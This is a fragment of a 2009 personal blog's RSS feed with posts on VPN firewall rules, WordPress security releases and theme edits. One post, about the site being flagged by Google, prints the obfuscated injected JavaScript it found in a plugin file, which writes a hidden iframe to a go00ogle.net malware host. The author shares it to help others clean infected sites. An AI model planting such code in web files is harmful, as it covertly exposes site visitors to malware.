google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
As I usually do, I googled &#8220;<a href="http://www.google.com/search?q=firestarter+vpn">firestarter vpn</a>&#8220;. Much to my dismay, it appeared that the <a href="http://fs-security.com/">Firestarter website</a> was no longer alive. Instead of the usual Firestarter page, a page filled with useless links about security and anti-virus loaded. Luckily I was able to access the cached version of the page from Google. Since then, it appears that the <a href="http://fs-security.com/">Firestarter website</a> has come back to life.</p>
<p>I wanted to make a note of how to allow VPN connections in the event that the Firestarter website becomes inaccessible again, that&#8217;s basically the point of this post. The page on the Firestarter site that details VPN connections can be <a href="http://fs-security.com/docs/vpn.php">found here</a>. This should apply to pretty much every Linux distribution, not just Ubuntu.</p>
<p>To allow VPN connections with the <strong>Microsoft VPN client</strong>, simply enter the following lines into <strong><em>/etc/firestarter/user-pre</em></strong>.</p>
<pre><code># Forward PPTP VPN client traffic
$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 1723 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INIF -o $IF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT</code></pre>
<p><script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
And to allow VPN connections with the <strong>Cisco VPN client</strong>, enter the following lines into <strong><em>/etc/firestarter/user-pre</em></strong>.</p>
<pre><code># Forward Cisco VPN client traffic
$IPT -A FORWARD -i $IF -o $INIF -p udp --dport 500 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 500 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p 50 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INIF -o $IF -p 50 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT</code></pre>
<p>Finally, if you&#8217;re running a <strong>Microsoft VPN server</strong> and want to allow incoming PPTP VPN connections, add the following lines to <strong><em>/etc/firestarter/user-pre</em></strong>.</p>
<pre><code># Forward PPTP VPN connections to internal server
SERVER=192.168.0.100 # Internal VPN server

$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 1723 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A PREROUTING -i $IF -p tcp --dport 1723 -j DNAT --to $SERVER
$IPT -A FORWARD -i $IF -o $INIF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A PREROUTING -i $IF -p 47 -j DNAT --to $SERVER </code></pre>
<p>That should pretty much cover it. If you are using OpenVPN, head over to the <a href="http://fs-security.com/docs/vpn.php">Firestarter VPN configuration</a> page for details.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/GuvpaV1NpYf7_mWqdZsRiAg9ObY/0/da"><img src="http://feedads.g.doubleclick.net/~a/GuvpaV1NpYf7_mWqdZsRiAg9ObY/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/GuvpaV1NpYf7_mWqdZsRiAg9ObY/1/da"><img src="http://feedads.g.doubleclick.net/~a/GuvpaV1NpYf7_mWqdZsRiAg9ObY/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=N5N1ggk0dcQ:FFpH1oQtk0o:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=N5N1ggk0dcQ:FFpH1oQtk0o:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=N5N1ggk0dcQ:FFpH1oQtk0o:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=N5N1ggk0dcQ:FFpH1oQtk0o:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=N5N1ggk0dcQ:FFpH1oQtk0o:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=N5N1ggk0dcQ:FFpH1oQtk0o:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=N5N1ggk0dcQ:FFpH1oQtk0o:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=N5N1ggk0dcQ:FFpH1oQtk0o:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=N5N1ggk0dcQ:FFpH1oQtk0o:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=N5N1ggk0dcQ:FFpH1oQtk0o:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/N5N1ggk0dcQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2009/11/07/how-to-cisco-and-microsoft-vpn-through-firestarter-on-ubuntu/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.longren.org/2009/11/07/how-to-cisco-and-microsoft-vpn-through-firestarter-on-ubuntu/</feedburner:origLink></item>
		<item>
		<title>WordPress 2.8.5: Hardening Release</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/gDKBneQIkWo/</link>
		<comments>http://www.longren.org/2009/10/21/wordpress-2-8-5-hardening-release/#comments</comments>
		<pubDate>Wed, 21 Oct 2009 13:15:48 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2471</guid>
		<description><![CDATA[WordPress 2.8.5 has been released.  This is another security release, just like the 2.8.4 release.  As with the last release, the SANS Internet Storm Center has another post about the latest WordPress.



The WordPress team decided to call 2.8.5 a hardening release because it includes some security features that were back-ported to 2.8.x from [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://wordpress.org/development/2009/10/wordpress-2-8-5-hardening-release/">WordPress 2.8.5</a> has been released.  This is another security release, just like the <a href="http://www.longren.org/2009/08/11/wordpress-2-8-4-security-release/">2.8.4 release</a>.  As with the last release, the <a href="http://isc.sans.org/">SANS Internet Storm Center</a> has <a href="http://isc.sans.org/diary.html?storyid=7414">another post</a> about the latest WordPress.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
The WordPress team decided to call 2.8.5 a hardening release because it includes some security features that were back-ported to 2.8.x from the upcoming 2.9 series.  Below are some details about <a href="http://wordpress.org/development/2009/10/wordpress-2-8-5-hardening-release/">2.8.5</a> from the <a href="http://wordpress.org/development/">WordPress development blog</a>:</p>
<blockquote><p>As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.</p>
<p>The headline changes in this release are:</p>
<ul>
<li>A fix for the Trackback Denial-of-Service attack that is currently being seen.</li>
<li>Removal of areas within the code where php code in variables was evaluated.</li>
<li>Switched the file upload functionality to be whitelisted for all users including Admins.</li>
<li>Retiring of the two importers of Tag data from old plugins.</li>
</ul>
</blockquote>
<p>You can <a href="http://wordpress.org/download/">download WordPress 2.8.5 here</a>.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/0PceM7u7osVQHFrQ0M6mxofP-_Q/0/da"><img src="http://feedads.g.doubleclick.net/~a/0PceM7u7osVQHFrQ0M6mxofP-_Q/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/0PceM7u7osVQHFrQ0M6mxofP-_Q/1/da"><img src="http://feedads.g.doubleclick.net/~a/0PceM7u7osVQHFrQ0M6mxofP-_Q/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=gDKBneQIkWo:gQZBSqutlEk:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=gDKBneQIkWo:gQZBSqutlEk:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=gDKBneQIkWo:gQZBSqutlEk:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=gDKBneQIkWo:gQZBSqutlEk:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=gDKBneQIkWo:gQZBSqutlEk:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=gDKBneQIkWo:gQZBSqutlEk:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=gDKBneQIkWo:gQZBSqutlEk:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=gDKBneQIkWo:gQZBSqutlEk:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=gDKBneQIkWo:gQZBSqutlEk:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=gDKBneQIkWo:gQZBSqutlEk:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/gDKBneQIkWo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2009/10/21/wordpress-2-8-5-hardening-release/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.longren.org/2009/10/21/wordpress-2-8-5-hardening-release/</feedburner:origLink></item>
		<item>
		<title>SEO Song Video</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/g_6ac2Lbs9A/</link>
		<comments>http://www.longren.org/2009/10/07/seo-song-video/#comments</comments>
		<pubDate>Wed, 07 Oct 2009 15:38:36 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Funny]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Personal]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2467</guid>
		<description><![CDATA[Check out the SEO song and video by Creare Group.  It&#8217;s pretty good, I got a kick out of it.

]]></description>
			<content:encoded><![CDATA[<p>Check out the <a href="http://www.youtube.com/watch?v=0Z9rP7CBs_Y">SEO song and video</a> by <a href="http://www.creare.co.uk/">Creare Group</a>.  It&#8217;s pretty good, I got a kick out of it.<br />
<object width="480" height="295"><param name="movie" value="http://www.youtube.com/v/0Z9rP7CBs_Y&#038;hl=en&#038;fs=1&#038;rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/0Z9rP7CBs_Y&#038;hl=en&#038;fs=1&#038;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="295"></embed></object></p>

<p><a href="http://feedads.g.doubleclick.net/~a/EM-gvESRtnUoZ3LBE0TU0QUqUj8/0/da"><img src="http://feedads.g.doubleclick.net/~a/EM-gvESRtnUoZ3LBE0TU0QUqUj8/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/EM-gvESRtnUoZ3LBE0TU0QUqUj8/1/da"><img src="http://feedads.g.doubleclick.net/~a/EM-gvESRtnUoZ3LBE0TU0QUqUj8/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=g_6ac2Lbs9A:Sj1v9lQmOjo:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=g_6ac2Lbs9A:Sj1v9lQmOjo:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=g_6ac2Lbs9A:Sj1v9lQmOjo:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=g_6ac2Lbs9A:Sj1v9lQmOjo:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=g_6ac2Lbs9A:Sj1v9lQmOjo:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=g_6ac2Lbs9A:Sj1v9lQmOjo:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=g_6ac2Lbs9A:Sj1v9lQmOjo:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=g_6ac2Lbs9A:Sj1v9lQmOjo:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=g_6ac2Lbs9A:Sj1v9lQmOjo:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=g_6ac2Lbs9A:Sj1v9lQmOjo:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/g_6ac2Lbs9A" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2009/10/07/seo-song-video/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.longren.org/2009/10/07/seo-song-video/</feedburner:origLink></item>
		<item>
		<title>Page Comments for K2 and Unwakeable</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/eVSXC_IW-JA/</link>
		<comments>http://www.longren.org/2009/08/13/page-comments-for-k2-and-unwakeable/#comments</comments>
		<pubDate>Thu, 13 Aug 2009 19:39:05 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noteworthy]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Unwakeable]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[k2]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2448</guid>
		<description><![CDATA[For some time now, comments have been disabled on pages in K2 and Unwakeable.  The modifications needed to allow comments on pages are extremely easy to make.  If you use either of these themes and wish to enable comments on pages, please continue reading.



1. Open the page.php file located in your K2 or [...]]]></description>
			<content:encoded><![CDATA[<p>For some time now, comments have been disabled on pages in <a href="http://www.getk2.com/">K2</a> and <a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable</a>.  The modifications needed to allow comments on pages are extremely easy to make.  If you use either of these themes and wish to enable comments on pages, please continue reading.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
<strong>1.</strong> Open the <strong>page.php</strong> file located in your K2 or Unwakeable theme directory.  Go to line 36, it should look like this:</p>
<pre><code>&lt;?php if ( get_post_custom_values('comments') ): ?&gt;</code></pre>
<p><strong>2.</strong> Comment out that if statement, so it should look like this when you&#8217;re done:</p>
<pre><code>&lt;?php //if ( get_post_custom_values('comments') ): ?&gt;</code></pre>
<p><strong>3.</strong> You&#8217;re halfway done at this point.  Now go to line 40, which should look like this:</p>
<pre><code>&lt;?php endif; ?&gt;</code></pre>
<p><strong>4.</strong> Comment out this piece of code as well, so modify line 40 so it looks like the code below.</p>
<pre><code>&lt;?php //endif; ?&gt;</code></pre>
<p><strong>5.</strong> Save the <strong>page.php</strong> file and you should be all set.</p>
<p>I will make this modification in the next release of Unwakeable so you won&#8217;t have to modify it yourself.  You can expect to see a new version of Unwakeable released within a week.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/SvBe5pK2e3dsJSGZmudxXmXGpRQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/SvBe5pK2e3dsJSGZmudxXmXGpRQ/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/SvBe5pK2e3dsJSGZmudxXmXGpRQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/SvBe5pK2e3dsJSGZmudxXmXGpRQ/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=eVSXC_IW-JA:v_tfUolvXF0:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=eVSXC_IW-JA:v_tfUolvXF0:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=eVSXC_IW-JA:v_tfUolvXF0:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=eVSXC_IW-JA:v_tfUolvXF0:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=eVSXC_IW-JA:v_tfUolvXF0:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=eVSXC_IW-JA:v_tfUolvXF0:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=eVSXC_IW-JA:v_tfUolvXF0:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=eVSXC_IW-JA:v_tfUolvXF0:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=eVSXC_IW-JA:v_tfUolvXF0:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=eVSXC_IW-JA:v_tfUolvXF0:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/eVSXC_IW-JA" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2009/08/13/page-comments-for-k2-and-unwakeable/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.longren.org/2009/08/13/page-comments-for-k2-and-unwakeable/</feedburner:origLink></item>
		<item>
		<title>WordPress 2.8.4 Security Release</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/qG4KOcCt7Ak/</link>
		<comments>http://www.longren.org/2009/08/11/wordpress-2-8-4-security-release/#comments</comments>
		<pubDate>Wed, 12 Aug 2009 04:21:52 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2439</guid>
		<description><![CDATA[WordPress 2.8.4 has been released.  It&#8217;s a security release, which means you should upgrade immediately.  This version fixes a problem that could allow remote users to reset the administrative password.  Below is a summary from the WordPress development blog:
Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://wordpress.org/development/2009/08/2-8-4-security-release/">WordPress 2.8.4</a> has been released.  It&#8217;s a security release, which means you should upgrade immediately.  This version fixes a problem that could allow remote users to reset the administrative password.  Below is a summary from the <a href="http://wordpress.org/development/">WordPress development blog</a>:</p>
<blockquote><p>Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.</p></blockquote>
<p>The <a href="http://isc.sans.org/">SANS Internet Storm Center</a> had <a href="http://isc.sans.org/diary.html?storyid=6934">a nice post</a> about this earlier today that details why WordPress 2.8.4 was necessary.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/nHECVQD1B_utnsisxuCwzNYNbHU/0/da"><img src="http://feedads.g.doubleclick.net/~a/nHECVQD1B_utnsisxuCwzNYNbHU/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/nHECVQD1B_utnsisxuCwzNYNbHU/1/da"><img src="http://feedads.g.doubleclick.net/~a/nHECVQD1B_utnsisxuCwzNYNbHU/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=qG4KOcCt7Ak:DcroIO-lw3M:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=qG4KOcCt7Ak:DcroIO-lw3M:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=qG4KOcCt7Ak:DcroIO-lw3M:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=qG4KOcCt7Ak:DcroIO-lw3M:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=qG4KOcCt7Ak:DcroIO-lw3M:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=qG4KOcCt7Ak:DcroIO-lw3M:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=qG4KOcCt7Ak:DcroIO-lw3M:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=qG4KOcCt7Ak:DcroIO-lw3M:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=qG4KOcCt7Ak:DcroIO-lw3M:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=qG4KOcCt7Ak:DcroIO-lw3M:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/qG4KOcCt7Ak" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2009/08/11/wordpress-2-8-4-security-release/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.longren.org/2009/08/11/wordpress-2-8-4-security-release/</feedburner:origLink></item>
		<item>
		<title>Longren.org Marked as Suspicious by Google</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/pQO27pj4cI4/</link>
		<comments>http://www.longren.org/2009/08/11/longren-org-marked-as-suspicious-by-google/#comments</comments>
		<pubDate>Tue, 11 Aug 2009 15:42:54 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noteworthy]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2435</guid>
		<description><![CDATA[So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google.  Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.



Turns out this blog was infected with a go00ogle.net malware script.  After following this [...]]]></description>
			<content:encoded><![CDATA[<p>So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google.  Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
Turns out this blog was infected with a go00ogle.net malware script.  After following <a href="http://blog.ambor.com/2009/07/how-to-remove-go00oglenet-infection.html">this helpful blog post</a>, I was able to pinpoint the <a href="http://www.1pixelout.net/code/audio-player-wordpress-plugin/">Audio Player plugin for WordPress</a> as the culprit.  The infected file was audio-player.js, and contained this snippet of code that should not have been there:</p>
<pre><code>function advQuery(){
	var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
	document.write("&lt;"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
	document.write(get+"/go.php"+Track+" style=display:none&gt;&lt;"+"/"+abs+"&gt;");
};advQuery();</code></pre>
<p>I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js.  This way there&#8217;s no chance audio-player.js will become infected again.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/sBunPeW7Fe5fmMaQ0mqb3bfebTs/0/da"><img src="http://feedads.g.doubleclick.net/~a/sBunPeW7Fe5fmMaQ0mqb3bfebTs/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/sBunPeW7Fe5fmMaQ0mqb3bfebTs/1/da"><img src="http://feedads.g.doubleclick.net/~a/sBunPeW7Fe5fmMaQ0mqb3bfebTs/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=pQO27pj4cI4:ZqPrFG3Ge8M:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=pQO27pj4cI4:ZqPrFG3Ge8M:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=pQO27pj4cI4:ZqPrFG3Ge8M:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=pQO27pj4cI4:ZqPrFG3Ge8M:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=pQO27pj4cI4:ZqPrFG3Ge8M:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=pQO27pj4cI4:ZqPrFG3Ge8M:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=pQO27pj4cI4:ZqPrFG3Ge8M:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=pQO27pj4cI4:ZqPrFG3Ge8M:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=pQO27pj4cI4:ZqPrFG3Ge8M:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=pQO27pj4cI4:ZqPrFG3Ge8M:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/pQO27pj4cI4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2009/08/11/longren-org-marked-as-suspicious-by-google/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.longren.org/2009/08/11/longren-org-marked-as-suspicious-by-google/</feedburner:origLink></item>
		<item>
		<title>K2 1.0-RC8</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/xr9UEdnLa4I/</link>
		<comments>http://www.longren.org/2009/07/16/k2-1-0-rc8/#comments</comments>
		<pubDate>Thu, 16 Jul 2009 15:12:38 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noteworthy]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Unwakeable]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[k2]]></category>
		<category><![CDATA[wordpress-theme]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2432</guid>
		<description><![CDATA[K2 1.0-RC8 has been released.  It has support for threaded comments and child themes.  You can also edit the post meta without having to modify any code now.  A list of bug fixes can be found here, and below is the full post from the K2 blog:
This release adds support for Threaded [...]]]></description>
